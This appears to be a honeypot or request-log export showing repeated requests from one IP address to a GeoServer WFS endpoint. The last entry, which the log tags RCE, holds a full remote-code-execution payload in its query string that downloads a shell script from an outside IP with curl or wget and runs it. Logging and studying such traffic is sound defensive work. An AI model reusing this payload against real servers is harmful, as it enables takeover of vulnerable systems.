# Remote Address Threat Level Method Path Query String Headers Body Acceptable Timestamp Port Request Types Attack Types Analyse Request Other Requests by Actor CSV Dump
1 83.222.191.62 3 POST /geoserver/wfs
Header Value
Content-Type application/xml
Content-Length 385
User-Agent Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host 188.245.40.243:443
Accept */*
Upgrade-Insecure-Requests 1
Connection keep-alive
Parameter Value
False 2024-09-22 22:02:08.107249 80
OTHER
2 83.222.191.62 3 POST /geoserver/wfs
Header Value
Content-Type application/xml
Content-Length 381
User-Agent Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host 188.245.40.243:443
Accept */*
Upgrade-Insecure-Requests 1
Connection keep-alive
Parameter Value
False 2024-09-22 21:55:38.650037 80
OTHER
3 83.222.191.62 3 POST /geoserver/wfs
Header Value
Content-Type application/xml
Content-Length 385
User-Agent Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host 188.245.40.243:443
Accept */*
Upgrade-Insecure-Requests 1
Connection keep-alive
Parameter Value
False 2024-09-21 22:44:14.364457 80
OTHER
4 83.222.191.62 3 POST /geoserver/wfs
Header Value
Content-Type application/xml
Content-Length 381
User-Agent Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host 188.245.40.243:443
Accept */*
Upgrade-Insecure-Requests 1
Connection keep-alive
Parameter Value
False 2024-09-21 22:23:28.939423 80
OTHER
5 83.222.191.62 4 GET /geoserver/wfs service=wfs&version=2.0.0&request=GetPropertyValue&typeNames=topp:states&valueReference=exec(java.lang.Runtime.getRuntime(),"cd /tmp; curl http://154.216.18.19/geo -o g.sh || wget http://154.216.18.19/geo -O g.sh; chmod +x g.sh; ./g.sh")
Header Value
User-Agent Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host 188.245.40.243:443
Accept */*
Upgrade-Insecure-Requests 1
Connection keep-alive
Parameter Value
False 2024-09-19 00:36:37.698588 80
ATTACK
SCAN
RECON
RCE
LFI
RFI